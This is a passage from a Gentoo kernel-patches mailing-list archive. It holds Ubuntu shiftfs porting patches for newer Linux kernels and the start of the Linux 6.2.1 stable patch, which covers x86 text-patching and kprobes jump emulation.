+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
+Cc: mpagano@gentoo.org
+
+With the porting of shiftfs from 5.15 to 5.17 some filesystem-related
+functions are now passing struct user_namespace as argument, however
+shiftfs logic is still relying on the fact that these functions need to
+use the main filesystem namespace.
+
+Make sure to always use init_user_ns to prevent breakage of system
+components that rely on shiftfs.
+
+Without this fix lxd was showing some issues, like failing to create any
+file inside a container when shiftfs was used (e.g., using zfs as
+storage pool).
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
+ 1 file changed, 24 insertions(+), 26 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 76c54bc12018..a21624c529f0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct user_namespace *ns,
+-			    struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
++	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(ns, lowerd, name);
++	err = vfs_removexattr(&init_user_ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(ns, dentry, name);
+-	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(&init_user_ns, dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct user_namespace *ns,
+-				 struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(ns, inode, diri, mode);
++		inode_init_owner(&init_user_ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
+-			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+ static int shiftfs_mknod(struct user_namespace *ns,
+@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(ns, inode, mask);
++	err = generic_permission(&init_user_ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(ns, loweri, mask);
++	err = inode_permission(&init_user_ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(ns, dentry, attr);
++	err = setattr_prepare(&init_user_ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(ns, lowerd, &newattr, NULL);
++	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(ns, dentry, handler->name);
++		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
+From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 27 Apr 2022 18:20:41 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21624c529f0..a5338dc6290c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -21,6 +21,7 @@
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
+ #include <linux/fiemap.h>
++#include <linux/pagemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Tue, 18 Oct 2022 17:09:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a5338dc6290c..34f080ae0fec 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
+ }
+ 
+ static int shiftfs_tmpfile(struct user_namespace *ns,
+-			   struct inode *dir, struct dentry *dentry,
++			   struct inode *dir, struct file *file,
+ 			   umode_t mode)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+-	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
+ 
+ 	if (!loweri->i_op->tmpfile)
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+-- 
+2.39.2
+
+From a04c96a9da98441b39fd8425d19d2ae6d92c0bf9 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 4 Jan 2023 10:25:30 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support linux 6.2
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 34f080ae0fec..cda74b614505 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -912,7 +912,7 @@ shiftfs_get_acl(struct inode *inode, int type, bool rcu)
+ 		return NULL;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	lower_acl = get_acl(loweri, type);
++	lower_acl = get_inode_acl(loweri, type);
+ 	revert_creds(oldcred);
+ 
+ 	if (lower_acl && !IS_ERR(lower_acl)) {
+@@ -1026,13 +1026,13 @@ static const struct inode_operations shiftfs_dir_inode_operations = {
+ 	.permission	= shiftfs_permission,
+ 	.getattr	= shiftfs_getattr,
+ 	.listxattr	= shiftfs_listxattr,
+-	.get_acl	= shiftfs_get_acl,
++	.get_inode_acl	= shiftfs_get_acl,
+ };
+ 
+ static const struct inode_operations shiftfs_file_inode_operations = {
+ 	.fiemap		= shiftfs_fiemap,
+ 	.getattr	= shiftfs_getattr,
+-	.get_acl	= shiftfs_get_acl,
++	.get_inode_acl	= shiftfs_get_acl,
+ 	.listxattr	= shiftfs_listxattr,
+ 	.permission	= shiftfs_permission,
+ 	.setattr	= shiftfs_setattr,
+@@ -1041,7 +1041,7 @@ static const struct inode_operations shiftfs_file_inode_operations = {
+ 
+ static const struct inode_operations shiftfs_special_inode_operations = {
+ 	.getattr	= shiftfs_getattr,
+-	.get_acl	= shiftfs_get_acl,
++	.get_inode_acl	= shiftfs_get_acl,
+ 	.listxattr	= shiftfs_listxattr,
+ 	.permission	= shiftfs_permission,
+ 	.setattr	= shiftfs_setattr,
+-- 
+2.39.2
+
+From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
+From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Date: Tue, 31 Jan 2023 17:11:48 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1990849
+
+We haven't supported idmapped layers with shiftfs and moreover, that makes
+no sense. Once lower fs support idmapped mounts when shiftfs is not needed.
+
+Starting from linux-image-5.15.0-48-generic users started seeing EOVERFLOW
+errors from the userspace side on a trivial fs operations inside the containers.
+
+This is caused by patches ("fs: tweak fsuidgid_has_mapping()"),
+("fs: support mapped mounts of mapped filesystems"). These patches extends
+and enables idmapped mounts support in Ubuntu kernel, but the problem is
+that shiftfs was not properly ported.
+
+See also:
+("namei: prepare for idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
+("overlayfs: do not mount on top of idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
+as a reference.
+
+This patch should be appied on top of kinetic/master-next and based on the
+changes by Andrea Righi 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
+
+This commit together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
+have to be ported to the jammy tree too.
+
+Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
+Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
+Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Acked-by: Tim Gardner <tim.gardner@canonical.com>
+Acked-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 16 +++++++++++++---
+ 1 file changed, 13 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index cda74b614505..2664e1fb65d3 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	struct renamedata rd = {
+-		.old_mnt_userns	= ns,
++		.old_mnt_userns	= &init_user_ns,
+ 		.old_dir	= loweri_dir_old,
+ 		.old_dentry	= lowerd_old,
+-		.new_mnt_userns	= ns,
++		.new_mnt_userns	= &init_user_ns,
+ 		.new_dir	= loweri_dir_new,
+ 		.new_dentry	= lowerd_new,
+ 	};
+@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(ns, inode))
++	if (!inode_owner_or_capable(&init_user_ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	/*
++	 * It makes no sense to handle idmapped layers from shiftfs.
++	 * And we didn't support it properly anyway.
++	 */
++	if (is_idmapped_mnt(path.mnt)) {
++		err = -EINVAL;
++		pr_err("idmapped layers are currently not supported\n");
++		goto out_put_path;
++	}
++
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
+-- 
+2.39.2
+


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-25 11:02 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-02-25 11:02 UTC (permalink / raw
  To: gentoo-commits

commit:     733f0b27e0c7f9379d6bcc7a7f3104646e48f743
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sat Feb 25 10:58:09 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sat Feb 25 10:58:09 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=733f0b27

Linux patch 6.2.2

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |   4 +
 1000_linux-6.2.1.patch | 552 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 556 insertions(+)

diff --git a/0000_README b/0000_README
index 8bb95e22..46624397 100644
--- a/0000_README
+++ b/0000_README
@@ -43,6 +43,10 @@ EXPERIMENTAL
 Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
+Patch:  1000_linux-6.2.1.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.1
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1000_linux-6.2.1.patch b/1000_linux-6.2.1.patch
new file mode 100644
index 00000000..5ca655c1
--- /dev/null
+++ b/1000_linux-6.2.1.patch
@@ -0,0 +1,552 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 135d93368d36e..f77188f30210f 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -3515,7 +3515,7 @@ F:	drivers/net/ieee802154/atusb.h
+ AUDIT SUBSYSTEM
+ M:	Paul Moore <paul@paul-moore.com>
+ M:	Eric Paris <eparis@redhat.com>
+-L:	linux-audit@redhat.com (moderated for non-subscribers)
++L:	audit@vger.kernel.org
+ S:	Supported
+ W:	https://github.com/linux-audit
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/pcmoore/audit.git
+diff --git a/Makefile b/Makefile
+index 3f6628780eb21..f26824f367a99 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 0
++SUBLEVEL = 1
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/x86/include/asm/text-patching.h b/arch/x86/include/asm/text-patching.h
+index f4b87f08f5c50..29832c338cdc5 100644
+--- a/arch/x86/include/asm/text-patching.h
++++ b/arch/x86/include/asm/text-patching.h
+@@ -184,6 +184,37 @@ void int3_emulate_ret(struct pt_regs *regs)
+ 	unsigned long ip = int3_emulate_pop(regs);
+ 	int3_emulate_jmp(regs, ip);
+ }
++
++static __always_inline
++void int3_emulate_jcc(struct pt_regs *regs, u8 cc, unsigned long ip, unsigned long disp)
++{
++	static const unsigned long jcc_mask[6] = {
++		[0] = X86_EFLAGS_OF,
++		[1] = X86_EFLAGS_CF,
++		[2] = X86_EFLAGS_ZF,
++		[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
++		[4] = X86_EFLAGS_SF,
++		[5] = X86_EFLAGS_PF,
++	};
++
++	bool invert = cc & 1;
++	bool match;
++
++	if (cc < 0xc) {
++		match = regs->flags & jcc_mask[cc >> 1];
++	} else {
++		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
++			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
++		if (cc >= 0xe)
++			match = match || (regs->flags & X86_EFLAGS_ZF);
++	}
++
++	if ((match && !invert) || (!match && invert))
++		ip += disp;
++
++	int3_emulate_jmp(regs, ip);
++}
++
+ #endif /* !CONFIG_UML_X86 */
+ 
+ #endif /* _ASM_X86_TEXT_PATCHING_H */
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 7d8c3cbde3685..81381a0194f39 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -340,6 +340,12 @@ next:
+ 	}
+ }
+ 
++static inline bool is_jcc32(struct insn *insn)
++{
++	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
++	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
++}
++
+ #if defined(CONFIG_RETPOLINE) && defined(CONFIG_OBJTOOL)
+ 
+ /*
+@@ -378,12 +384,6 @@ static int emit_indirect(int op, int reg, u8 *bytes)
+ 	return i;
+ }
+ 
+-static inline bool is_jcc32(struct insn *insn)
+-{
+-	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
+-	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
+-}
+-
+ static int emit_call_track_retpoline(void *addr, struct insn *insn, int reg, u8 *bytes)
+ {
+ 	u8 op = insn->opcode.bytes[0];
+@@ -1772,6 +1772,11 @@ void text_poke_sync(void)
+ 	on_each_cpu(do_sync_core, NULL, 1);
+ }
+ 
++/*
++ * NOTE: crazy scheme to allow patching Jcc.d32 but not increase the size of
++ * this thing. When len == 6 everything is prefixed with 0x0f and we map
++ * opcode to Jcc.d8, using len to distinguish.
++ */
+ struct text_poke_loc {
+ 	/* addr := _stext + rel_addr */
+ 	s32 rel_addr;
+@@ -1893,6 +1898,10 @@ noinstr int poke_int3_handler(struct pt_regs *regs)
+ 		int3_emulate_jmp(regs, (long)ip + tp->disp);
+ 		break;
+ 
++	case 0x70 ... 0x7f: /* Jcc */
++		int3_emulate_jcc(regs, tp->opcode & 0xf, (long)ip, tp->disp);
++		break;
++
+ 	default:
+ 		BUG();
+ 	}
+@@ -1966,16 +1975,26 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * Second step: update all but the first byte of the patched range.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		u8 old[POKE_MAX_OPCODE_SIZE] = { tp[i].old, };
++		u8 old[POKE_MAX_OPCODE_SIZE+1] = { tp[i].old, };
++		u8 _new[POKE_MAX_OPCODE_SIZE+1];
++		const u8 *new = tp[i].text;
+ 		int len = tp[i].len;
+ 
+ 		if (len - INT3_INSN_SIZE > 0) {
+ 			memcpy(old + INT3_INSN_SIZE,
+ 			       text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+ 			       len - INT3_INSN_SIZE);
++
++			if (len == 6) {
++				_new[0] = 0x0f;
++				memcpy(_new + 1, new, 5);
++				new = _new;
++			}
++
+ 			text_poke(text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+-				  (const char *)tp[i].text + INT3_INSN_SIZE,
++				  new + INT3_INSN_SIZE,
+ 				  len - INT3_INSN_SIZE);
++
+ 			do_sync++;
+ 		}
+ 
+@@ -2003,8 +2022,7 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 		 * The old instruction is recorded so that the event can be
+ 		 * processed forwards or backwards.
+ 		 */
+-		perf_event_text_poke(text_poke_addr(&tp[i]), old, len,
+-				     tp[i].text, len);
++		perf_event_text_poke(text_poke_addr(&tp[i]), old, len, new, len);
+ 	}
+ 
+ 	if (do_sync) {
+@@ -2021,10 +2039,15 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * replacing opcode.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		if (tp[i].text[0] == INT3_INSN_OPCODE)
++		u8 byte = tp[i].text[0];
++
++		if (tp[i].len == 6)
++			byte = 0x0f;
++
++		if (byte == INT3_INSN_OPCODE)
+ 			continue;
+ 
+-		text_poke(text_poke_addr(&tp[i]), tp[i].text, INT3_INSN_SIZE);
++		text_poke(text_poke_addr(&tp[i]), &byte, INT3_INSN_SIZE);
+ 		do_sync++;
+ 	}
+ 
+@@ -2042,9 +2065,11 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 			       const void *opcode, size_t len, const void *emulate)
+ {
+ 	struct insn insn;
+-	int ret, i;
++	int ret, i = 0;
+ 
+-	memcpy((void *)tp->text, opcode, len);
++	if (len == 6)
++		i = 1;
++	memcpy((void *)tp->text, opcode+i, len-i);
+ 	if (!emulate)
+ 		emulate = opcode;
+ 
+@@ -2055,6 +2080,13 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	tp->len = len;
+ 	tp->opcode = insn.opcode.bytes[0];
+ 
++	if (is_jcc32(&insn)) {
++		/*
++		 * Map Jcc.d32 onto Jcc.d8 and use len to distinguish.
++		 */
++		tp->opcode = insn.opcode.bytes[1] - 0x10;
++	}
++
+ 	switch (tp->opcode) {
+ 	case RET_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+@@ -2071,7 +2103,6 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 		BUG_ON(len != insn.length);
+ 	}
+ 
+-
+ 	switch (tp->opcode) {
+ 	case INT3_INSN_OPCODE:
+ 	case RET_INSN_OPCODE:
+@@ -2080,6 +2111,7 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	case CALL_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+ 	case JMP8_INSN_OPCODE:
++	case 0x70 ... 0x7f: /* Jcc */
+ 		tp->disp = insn.immediate.value;
+ 		break;
+ 
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 695873c0f50b5..0ce969ae250f7 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -464,50 +464,26 @@ static void kprobe_emulate_call(struct kprobe *p, struct pt_regs *regs)
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call);
+ 
+-static nokprobe_inline
+-void __kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs, bool cond)
++static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (cond)
+-		ip += p->ainsn.rel32;
++	ip += p->ainsn.rel32;
+ 	int3_emulate_jmp(regs, ip);
+ }
+-
+-static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+-{
+-	__kprobe_emulate_jmp(p, regs, true);
+-}
+ NOKPROBE_SYMBOL(kprobe_emulate_jmp);
+ 
+-static const unsigned long jcc_mask[6] = {
+-	[0] = X86_EFLAGS_OF,
+-	[1] = X86_EFLAGS_CF,
+-	[2] = X86_EFLAGS_ZF,
+-	[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
+-	[4] = X86_EFLAGS_SF,
+-	[5] = X86_EFLAGS_PF,
+-};
+-
+ static void kprobe_emulate_jcc(struct kprobe *p, struct pt_regs *regs)
+ {
+-	bool invert = p->ainsn.jcc.type & 1;
+-	bool match;
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (p->ainsn.jcc.type < 0xc) {
+-		match = regs->flags & jcc_mask[p->ainsn.jcc.type >> 1];
+-	} else {
+-		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
+-			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
+-		if (p->ainsn.jcc.type >= 0xe)
+-			match = match || (regs->flags & X86_EFLAGS_ZF);
+-	}
+-	__kprobe_emulate_jmp(p, regs, (match && !invert) || (!match && invert));
++	int3_emulate_jcc(regs, p->ainsn.jcc.type, ip, p->ainsn.rel32);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_jcc);
+ 
+ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ {
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 	bool match;
+ 
+ 	if (p->ainsn.loop.type != 3) {	/* LOOP* */
+@@ -535,7 +511,9 @@ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ 	else if (p->ainsn.loop.type == 1)	/* LOOPE */
+ 		match = match && (regs->flags & X86_EFLAGS_ZF);
+ 
+-	__kprobe_emulate_jmp(p, regs, match);
++	if (match)
++		ip += p->ainsn.rel32;
++	int3_emulate_jmp(regs, ip);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_loop);
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index 2ebc338980bcd..b70670a985978 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -9,6 +9,7 @@ enum insn_type {
+ 	NOP = 1,  /* site cond-call */
+ 	JMP = 2,  /* tramp / site tail-call */
+ 	RET = 3,  /* tramp / site cond-tail-call */
++	JCC = 4,
+ };
+ 
+ /*
